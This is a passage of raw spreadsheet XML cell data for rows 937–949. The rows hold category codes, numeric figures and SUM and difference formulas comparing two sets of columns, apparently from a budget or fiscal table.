      <c r="G937" s="17"/>
      <c r="H937" s="17"/>
      <c r="I937" s="17"/>
      <c r="J937" s="17"/>
      <c r="K937" s="17"/>
      <c r="L937" s="17"/>
      <c r="M937" s="17"/>
      <c r="N937" s="17"/>
      <c r="O937" s="17"/>
      <c r="P937" s="17"/>
      <c r="Q937" s="17"/>
      <c r="R937" s="17"/>
      <c r="S937" s="17"/>
      <c r="T937" s="17"/>
      <c r="U937" s="17"/>
      <c r="V937" s="17"/>
      <c r="W937" s="17"/>
      <c r="X937" s="17"/>
      <c r="Y937" s="17"/>
      <c r="Z937" s="17"/>
      <c r="AA937" s="17"/>
      <c r="AB937" s="17"/>
      <c r="AC937" s="17"/>
      <c r="AD937" s="17"/>
      <c r="AE937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP937" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="938" ht="18" customHeight="1" spans="1:42">
      <c r="A938" s="10"/>
      <c r="B938" s="10"/>
      <c r="C938" s="28"/>
      <c r="D938" s="10">
        <v>2130550</v>
      </c>
      <c r="E938" s="16" t="s">
        <v>3713</v>
      </c>
      <c r="F938" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G938" s="17"/>
      <c r="H938" s="17"/>
      <c r="I938" s="17"/>
      <c r="J938" s="17"/>
      <c r="K938" s="17"/>
      <c r="L938" s="17"/>
      <c r="M938" s="17"/>
      <c r="N938" s="17"/>
      <c r="O938" s="17"/>
      <c r="P938" s="17"/>
      <c r="Q938" s="17"/>
      <c r="R938" s="17"/>
      <c r="S938" s="17"/>
      <c r="T938" s="17"/>
      <c r="U938" s="17"/>
      <c r="V938" s="17"/>
      <c r="W938" s="17"/>
      <c r="X938" s="17"/>
      <c r="Y938" s="17"/>
      <c r="Z938" s="17"/>
      <c r="AA938" s="17"/>
      <c r="AB938" s="17"/>
      <c r="AC938" s="17"/>
      <c r="AD938" s="17"/>
      <c r="AE938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP938" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="939" ht="18" customHeight="1" spans="1:42">
      <c r="A939" s="10"/>
      <c r="B939" s="10"/>
      <c r="C939" s="28"/>
      <c r="D939" s="10">
        <v>2130599</v>
      </c>
      <c r="E939" s="16" t="s">
        <v>3714</v>
      </c>
      <c r="F939" s="14">
        <f t="shared" si="449"/>
        <v>1395</v>
      </c>
      <c r="G939" s="17">
        <v>12</v>
      </c>
      <c r="H939" s="17">
        <v>64</v>
      </c>
      <c r="I939" s="17">
        <v>118</v>
      </c>
      <c r="J939" s="17"/>
      <c r="K939" s="17">
        <v>355</v>
      </c>
      <c r="L939" s="17">
        <v>38</v>
      </c>
      <c r="M939" s="17"/>
      <c r="N939" s="17">
        <v>287</v>
      </c>
      <c r="O939" s="17">
        <v>0</v>
      </c>
      <c r="P939" s="17">
        <v>182</v>
      </c>
      <c r="Q939" s="17"/>
      <c r="R939" s="17">
        <v>415</v>
      </c>
      <c r="S939" s="17">
        <v>12</v>
      </c>
      <c r="T939" s="17">
        <v>64</v>
      </c>
      <c r="U939" s="17">
        <v>107</v>
      </c>
      <c r="V939" s="17"/>
      <c r="W939" s="17">
        <v>355</v>
      </c>
      <c r="X939" s="17">
        <v>38</v>
      </c>
      <c r="Y939" s="17"/>
      <c r="Z939" s="17">
        <v>154</v>
      </c>
      <c r="AA939" s="17"/>
      <c r="AB939" s="17">
        <v>182</v>
      </c>
      <c r="AC939" s="17"/>
      <c r="AD939" s="17">
        <v>131</v>
      </c>
      <c r="AE939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG939" s="17">
        <f t="shared" si="455"/>
        <v>11</v>
      </c>
      <c r="AH939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL939" s="17">
        <f t="shared" si="455"/>
        <v>133</v>
      </c>
      <c r="AM939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO939" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP939" s="17">
        <f t="shared" si="455"/>
        <v>284</v>
      </c>
    </row>
    <row r="940" ht="18" customHeight="1" spans="1:42">
      <c r="A940" s="10"/>
      <c r="B940" s="10"/>
      <c r="C940" s="28"/>
      <c r="D940" s="10">
        <v>21307</v>
      </c>
      <c r="E940" s="11" t="s">
        <v>3715</v>
      </c>
      <c r="F940" s="14">
        <f t="shared" si="449"/>
        <v>5185</v>
      </c>
      <c r="G940" s="12">
        <f t="shared" ref="G940:R940" si="456">SUM(G941:G946)</f>
        <v>252</v>
      </c>
      <c r="H940" s="12">
        <f t="shared" si="456"/>
        <v>146</v>
      </c>
      <c r="I940" s="12">
        <f t="shared" si="456"/>
        <v>483</v>
      </c>
      <c r="J940" s="12">
        <f t="shared" si="456"/>
        <v>367</v>
      </c>
      <c r="K940" s="12">
        <f t="shared" si="456"/>
        <v>724</v>
      </c>
      <c r="L940" s="12">
        <f t="shared" si="456"/>
        <v>1738</v>
      </c>
      <c r="M940" s="12">
        <f t="shared" si="456"/>
        <v>432</v>
      </c>
      <c r="N940" s="12">
        <f t="shared" si="456"/>
        <v>278</v>
      </c>
      <c r="O940" s="12">
        <f t="shared" si="456"/>
        <v>361</v>
      </c>
      <c r="P940" s="12">
        <f t="shared" si="456"/>
        <v>196</v>
      </c>
      <c r="Q940" s="12">
        <f t="shared" si="456"/>
        <v>338</v>
      </c>
      <c r="R940" s="12">
        <f t="shared" si="456"/>
        <v>268</v>
      </c>
      <c r="S940" s="12">
        <v>225</v>
      </c>
      <c r="T940" s="12">
        <v>101</v>
      </c>
      <c r="U940" s="12">
        <v>514</v>
      </c>
      <c r="V940" s="12">
        <v>293</v>
      </c>
      <c r="W940" s="12">
        <v>627</v>
      </c>
      <c r="X940" s="12">
        <v>1623</v>
      </c>
      <c r="Y940" s="12">
        <v>356</v>
      </c>
      <c r="Z940" s="12">
        <v>253</v>
      </c>
      <c r="AA940" s="12">
        <v>221</v>
      </c>
      <c r="AB940" s="12">
        <v>141</v>
      </c>
      <c r="AC940" s="12">
        <v>310</v>
      </c>
      <c r="AD940" s="12">
        <v>306</v>
      </c>
      <c r="AE940" s="12">
        <f t="shared" ref="AE940:AP940" si="457">SUM(AE941:AE946)</f>
        <v>27</v>
      </c>
      <c r="AF940" s="12">
        <f t="shared" si="457"/>
        <v>45</v>
      </c>
      <c r="AG940" s="12">
        <f t="shared" si="457"/>
        <v>-31</v>
      </c>
      <c r="AH940" s="12">
        <f t="shared" si="457"/>
        <v>74</v>
      </c>
      <c r="AI940" s="12">
        <f t="shared" si="457"/>
        <v>97</v>
      </c>
      <c r="AJ940" s="12">
        <f t="shared" si="457"/>
        <v>115</v>
      </c>
      <c r="AK940" s="12">
        <f t="shared" si="457"/>
        <v>76</v>
      </c>
      <c r="AL940" s="12">
        <f t="shared" si="457"/>
        <v>25</v>
      </c>
      <c r="AM940" s="12">
        <f t="shared" si="457"/>
        <v>140</v>
      </c>
      <c r="AN940" s="12">
        <f t="shared" si="457"/>
        <v>55</v>
      </c>
      <c r="AO940" s="12">
        <f t="shared" si="457"/>
        <v>28</v>
      </c>
      <c r="AP940" s="12">
        <f t="shared" si="457"/>
        <v>-38</v>
      </c>
    </row>
    <row r="941" ht="18" customHeight="1" spans="1:42">
      <c r="A941" s="10"/>
      <c r="B941" s="10"/>
      <c r="C941" s="28"/>
      <c r="D941" s="10">
        <v>2130701</v>
      </c>
      <c r="E941" s="16" t="s">
        <v>3716</v>
      </c>
      <c r="F941" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G941" s="17"/>
      <c r="H941" s="17"/>
      <c r="I941" s="17"/>
      <c r="J941" s="17"/>
      <c r="K941" s="17"/>
      <c r="L941" s="17"/>
      <c r="M941" s="17"/>
      <c r="N941" s="17"/>
      <c r="O941" s="17"/>
      <c r="P941" s="17"/>
      <c r="Q941" s="17"/>
      <c r="R941" s="17"/>
      <c r="S941" s="17"/>
      <c r="T941" s="17"/>
      <c r="U941" s="17"/>
      <c r="V941" s="17"/>
      <c r="W941" s="17"/>
      <c r="X941" s="17"/>
      <c r="Y941" s="17"/>
      <c r="Z941" s="17"/>
      <c r="AA941" s="17"/>
      <c r="AB941" s="17"/>
      <c r="AC941" s="17"/>
      <c r="AD941" s="17"/>
      <c r="AE941" s="17">
        <f t="shared" ref="AE941:AP946" si="458">G941-S941</f>
        <v>0</v>
      </c>
      <c r="AF941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AG941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AH941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AI941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AJ941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AK941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AL941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AM941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AN941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AO941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AP941" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
    </row>
    <row r="942" ht="18" customHeight="1" spans="1:42">
      <c r="A942" s="10"/>
      <c r="B942" s="10"/>
      <c r="C942" s="28"/>
      <c r="D942" s="10">
        <v>2130704</v>
      </c>
      <c r="E942" s="16" t="s">
        <v>3717</v>
      </c>
      <c r="F942" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G942" s="17"/>
      <c r="H942" s="17"/>
      <c r="I942" s="17"/>
      <c r="J942" s="17"/>
      <c r="K942" s="17"/>
      <c r="L942" s="17"/>
      <c r="M942" s="17"/>
      <c r="N942" s="17"/>
      <c r="O942" s="17"/>
      <c r="P942" s="17"/>
      <c r="Q942" s="17"/>
      <c r="R942" s="17"/>
      <c r="S942" s="17"/>
      <c r="T942" s="17"/>
      <c r="U942" s="17"/>
      <c r="V942" s="17"/>
      <c r="W942" s="17"/>
      <c r="X942" s="17"/>
      <c r="Y942" s="17"/>
      <c r="Z942" s="17"/>
      <c r="AA942" s="17"/>
      <c r="AB942" s="17"/>
      <c r="AC942" s="17"/>
      <c r="AD942" s="17"/>
      <c r="AE942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AF942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AG942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AH942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AI942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AJ942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AK942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AL942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AM942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AN942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AO942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AP942" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
    </row>
    <row r="943" ht="18" customHeight="1" spans="1:42">
      <c r="A943" s="10"/>
      <c r="B943" s="10"/>
      <c r="C943" s="28"/>
      <c r="D943" s="10">
        <v>2130705</v>
      </c>
      <c r="E943" s="16" t="s">
        <v>3718</v>
      </c>
      <c r="F943" s="14">
        <f t="shared" si="449"/>
        <v>3297</v>
      </c>
      <c r="G943" s="17">
        <v>252</v>
      </c>
      <c r="H943" s="17">
        <v>126</v>
      </c>
      <c r="I943" s="17">
        <v>337</v>
      </c>
      <c r="J943" s="17">
        <v>258</v>
      </c>
      <c r="K943" s="17">
        <v>670</v>
      </c>
      <c r="L943" s="17">
        <v>1260</v>
      </c>
      <c r="M943" s="17">
        <v>231</v>
      </c>
      <c r="N943" s="17">
        <v>143</v>
      </c>
      <c r="O943" s="17">
        <v>90</v>
      </c>
      <c r="P943" s="17">
        <v>138</v>
      </c>
      <c r="Q943" s="17">
        <v>88</v>
      </c>
      <c r="R943" s="17">
        <v>82</v>
      </c>
      <c r="S943" s="17">
        <v>225</v>
      </c>
      <c r="T943" s="17">
        <v>81</v>
      </c>
      <c r="U943" s="17">
        <v>265</v>
      </c>
      <c r="V943" s="17">
        <v>184</v>
      </c>
      <c r="W943" s="17">
        <v>583</v>
      </c>
      <c r="X943" s="17">
        <v>1200</v>
      </c>
      <c r="Y943" s="17">
        <v>187</v>
      </c>
      <c r="Z943" s="17">
        <v>118</v>
      </c>
      <c r="AA943" s="17">
        <v>81</v>
      </c>
      <c r="AB943" s="17">
        <v>83</v>
      </c>
      <c r="AC943" s="17">
        <v>60</v>
      </c>
      <c r="AD943" s="17">
        <v>249</v>
      </c>
      <c r="AE943" s="17">
        <f t="shared" si="458"/>
        <v>27</v>
      </c>
      <c r="AF943" s="17">
        <f t="shared" si="458"/>
        <v>45</v>
      </c>
      <c r="AG943" s="17">
        <f t="shared" si="458"/>
        <v>72</v>
      </c>
      <c r="AH943" s="17">
        <f t="shared" si="458"/>
        <v>74</v>
      </c>
      <c r="AI943" s="17">
        <f t="shared" si="458"/>
        <v>87</v>
      </c>
      <c r="AJ943" s="17">
        <f t="shared" si="458"/>
        <v>60</v>
      </c>
      <c r="AK943" s="17">
        <f t="shared" si="458"/>
        <v>44</v>
      </c>
      <c r="AL943" s="17">
        <f t="shared" si="458"/>
        <v>25</v>
      </c>
      <c r="AM943" s="17">
        <f t="shared" si="458"/>
        <v>9</v>
      </c>
      <c r="AN943" s="17">
        <f t="shared" si="458"/>
        <v>55</v>
      </c>
      <c r="AO943" s="17">
        <f t="shared" si="458"/>
        <v>28</v>
      </c>
      <c r="AP943" s="17">
        <f t="shared" si="458"/>
        <v>-167</v>
      </c>
    </row>
    <row r="944" ht="18" customHeight="1" spans="1:42">
      <c r="A944" s="10"/>
      <c r="B944" s="10"/>
      <c r="C944" s="28"/>
      <c r="D944" s="10">
        <v>2130706</v>
      </c>
      <c r="E944" s="16" t="s">
        <v>3719</v>
      </c>
      <c r="F944" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G944" s="17"/>
      <c r="H944" s="17"/>
      <c r="I944" s="17"/>
      <c r="J944" s="17"/>
      <c r="K944" s="17"/>
      <c r="L944" s="17"/>
      <c r="M944" s="17"/>
      <c r="N944" s="17"/>
      <c r="O944" s="17"/>
      <c r="P944" s="17"/>
      <c r="Q944" s="17"/>
      <c r="R944" s="17"/>
      <c r="S944" s="17"/>
      <c r="T944" s="17"/>
      <c r="U944" s="17"/>
      <c r="V944" s="17"/>
      <c r="W944" s="17"/>
      <c r="X944" s="17"/>
      <c r="Y944" s="17"/>
      <c r="Z944" s="17"/>
      <c r="AA944" s="17"/>
      <c r="AB944" s="17"/>
      <c r="AC944" s="17"/>
      <c r="AD944" s="17"/>
      <c r="AE944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AF944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AG944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AH944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AI944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AJ944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AK944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AL944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AM944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AN944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AO944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AP944" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
    </row>
    <row r="945" ht="18" customHeight="1" spans="1:42">
      <c r="A945" s="10"/>
      <c r="B945" s="10"/>
      <c r="C945" s="28"/>
      <c r="D945" s="10">
        <v>2130707</v>
      </c>
      <c r="E945" s="16" t="s">
        <v>3720</v>
      </c>
      <c r="F945" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G945" s="17"/>
      <c r="H945" s="17"/>
      <c r="I945" s="17"/>
      <c r="J945" s="17"/>
      <c r="K945" s="17"/>
      <c r="L945" s="17"/>
      <c r="M945" s="17"/>
      <c r="N945" s="17"/>
      <c r="O945" s="17"/>
      <c r="P945" s="17"/>
      <c r="Q945" s="17"/>
      <c r="R945" s="17"/>
      <c r="S945" s="17"/>
      <c r="T945" s="17"/>
      <c r="U945" s="17"/>
      <c r="V945" s="17"/>
      <c r="W945" s="17"/>
      <c r="X945" s="17"/>
      <c r="Y945" s="17"/>
      <c r="Z945" s="17"/>
      <c r="AA945" s="17"/>
      <c r="AB945" s="17"/>
      <c r="AC945" s="17"/>
      <c r="AD945" s="17"/>
      <c r="AE945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AF945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AG945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AH945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AI945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AJ945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AK945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AL945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AM945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AN945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AO945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AP945" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
    </row>
    <row r="946" ht="18" customHeight="1" spans="1:42">
      <c r="A946" s="10"/>
      <c r="B946" s="10"/>
      <c r="C946" s="28"/>
      <c r="D946" s="10">
        <v>2130799</v>
      </c>
      <c r="E946" s="16" t="s">
        <v>3721</v>
      </c>
      <c r="F946" s="14">
        <f t="shared" si="449"/>
        <v>1888</v>
      </c>
      <c r="G946" s="17"/>
      <c r="H946" s="17">
        <v>20</v>
      </c>
      <c r="I946" s="17">
        <v>146</v>
      </c>
      <c r="J946" s="17">
        <v>109</v>
      </c>
      <c r="K946" s="17">
        <v>54</v>
      </c>
      <c r="L946" s="17">
        <v>478</v>
      </c>
      <c r="M946" s="17">
        <v>201</v>
      </c>
      <c r="N946" s="17">
        <v>135</v>
      </c>
      <c r="O946" s="17">
        <v>271</v>
      </c>
      <c r="P946" s="17">
        <v>58</v>
      </c>
      <c r="Q946" s="17">
        <v>250</v>
      </c>
      <c r="R946" s="17">
        <v>186</v>
      </c>
      <c r="S946" s="17"/>
      <c r="T946" s="17">
        <v>20</v>
      </c>
      <c r="U946" s="17">
        <v>249</v>
      </c>
      <c r="V946" s="17">
        <v>109</v>
      </c>
      <c r="W946" s="17">
        <v>44</v>
      </c>
      <c r="X946" s="17">
        <v>423</v>
      </c>
      <c r="Y946" s="17">
        <v>169</v>
      </c>
      <c r="Z946" s="17">
        <v>135</v>
      </c>
      <c r="AA946" s="17">
        <v>140</v>
      </c>
      <c r="AB946" s="17">
        <v>58</v>
      </c>
      <c r="AC946" s="17">
        <v>250</v>
      </c>
      <c r="AD946" s="17">
        <v>57</v>
      </c>
      <c r="AE946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AF946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AG946" s="17">
        <f t="shared" si="458"/>
        <v>-103</v>
      </c>
      <c r="AH946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AI946" s="17">
        <f t="shared" si="458"/>
        <v>10</v>
      </c>
      <c r="AJ946" s="17">
        <f t="shared" si="458"/>
        <v>55</v>
      </c>
      <c r="AK946" s="17">
        <f t="shared" si="458"/>
        <v>32</v>
      </c>
      <c r="AL946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AM946" s="17">
        <f t="shared" si="458"/>
        <v>131</v>
      </c>
      <c r="AN946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AO946" s="17">
        <f t="shared" si="458"/>
        <v>0</v>
      </c>
      <c r="AP946" s="17">
        <f t="shared" si="458"/>
        <v>129</v>
      </c>
    </row>
    <row r="947" ht="18" customHeight="1" spans="1:42">
      <c r="A947" s="10"/>
      <c r="B947" s="10"/>
      <c r="C947" s="28"/>
      <c r="D947" s="10">
        <v>21308</v>
      </c>
      <c r="E947" s="11" t="s">
        <v>3722</v>
      </c>
      <c r="F947" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G947" s="12">
        <f t="shared" ref="G947:R947" si="459">SUM(G948:G953)</f>
        <v>0</v>
      </c>
      <c r="H947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="I947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="J947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="K947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="L947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="M947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="N947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="O947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="P947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="Q947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="R947" s="12">
        <f t="shared" si="459"/>
        <v>0</v>
      </c>
      <c r="S947" s="12">
        <v>0</v>
      </c>
      <c r="T947" s="12">
        <v>0</v>
      </c>
      <c r="U947" s="12">
        <v>0</v>
      </c>
      <c r="V947" s="12">
        <v>0</v>
      </c>
      <c r="W947" s="12">
        <v>0</v>
      </c>
      <c r="X947" s="12">
        <v>0</v>
      </c>
      <c r="Y947" s="12">
        <v>0</v>
      </c>
      <c r="Z947" s="12">
        <v>0</v>
      </c>
      <c r="AA947" s="12">
        <v>0</v>
      </c>
      <c r="AB947" s="12">
        <v>0</v>
      </c>
      <c r="AC947" s="12">
        <v>0</v>
      </c>
      <c r="AD947" s="12">
        <v>0</v>
      </c>
      <c r="AE947" s="12">
        <f t="shared" ref="AE947:AP947" si="460">SUM(AE948:AE953)</f>
        <v>0</v>
      </c>
      <c r="AF947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AG947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AH947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AI947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AJ947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AK947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AL947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AM947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AN947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AO947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
      <c r="AP947" s="12">
        <f t="shared" si="460"/>
        <v>0</v>
      </c>
    </row>
    <row r="948" ht="18" customHeight="1" spans="1:42">
      <c r="A948" s="10"/>
      <c r="B948" s="10"/>
      <c r="C948" s="28"/>
      <c r="D948" s="10">
        <v>2130801</v>
      </c>
      <c r="E948" s="16" t="s">
        <v>3723</v>
      </c>
      <c r="F948" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G948" s="17"/>
      <c r="H948" s="17"/>
      <c r="I948" s="17"/>
      <c r="J948" s="17"/>
      <c r="K948" s="17"/>
      <c r="L948" s="17"/>
      <c r="M948" s="17"/>
      <c r="N948" s="17"/>
      <c r="O948" s="17"/>
      <c r="P948" s="17"/>
      <c r="Q948" s="17"/>
      <c r="R948" s="17"/>
      <c r="S948" s="17"/>
      <c r="T948" s="17"/>
      <c r="U948" s="17"/>
      <c r="V948" s="17"/>
      <c r="W948" s="17"/>
      <c r="X948" s="17"/>
      <c r="Y948" s="17"/>
      <c r="Z948" s="17"/>
      <c r="AA948" s="17"/>
      <c r="AB948" s="17"/>
      <c r="AC948" s="17"/>
      <c r="AD948" s="17"/>
      <c r="AE948" s="17">
        <f t="shared" ref="AE948:AP953" si="461">G948-S948</f>
        <v>0</v>
      </c>
      <c r="AF948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AG948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AH948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AI948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AJ948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AK948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AL948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AM948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AN948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AO948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
      <c r="AP948" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
      </c>
    </row>
    <row r="949" ht="18" customHeight="1" spans="1:42">
      <c r="A949" s="10"/>
      <c r="B949" s="10"/>
      <c r="C949" s="28"/>
      <c r="D949" s="10">
        <v>2130802</v>
      </c>
      <c r="E949" s="16" t="s">
        <v>3724</v>
      </c>
      <c r="F949" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G949" s="17"/>
      <c r="H949" s="17"/>
      <c r="I949" s="17"/>
      <c r="J949" s="17"/>
      <c r="K949" s="17"/>
      <c r="L949" s="17"/>
      <c r="M949" s="17"/>
      <c r="N949" s="17"/>
      <c r="O949" s="17"/>
      <c r="P949" s="17"/>
      <c r="Q949" s="17"/>
      <c r="R949" s="17"/>
      <c r="S949" s="17"/>
      <c r="T949" s="17"/>
      <c r="U949" s="17"/>
      <c r="V949" s="17"/>
      <c r="W949" s="17"/>
      <c r="X949" s="17"/>
      <c r="Y949" s="17"/>
      <c r="Z949" s="17"/>
      <c r="AA949" s="17"/>
      <c r="AB949" s="17"/>
      <c r="AC949" s="17"/>
      <c r="AD949" s="17"/>
      <c r="AE949" s="17">
        <f t="shared" si="461"/>
        <v>0</v>
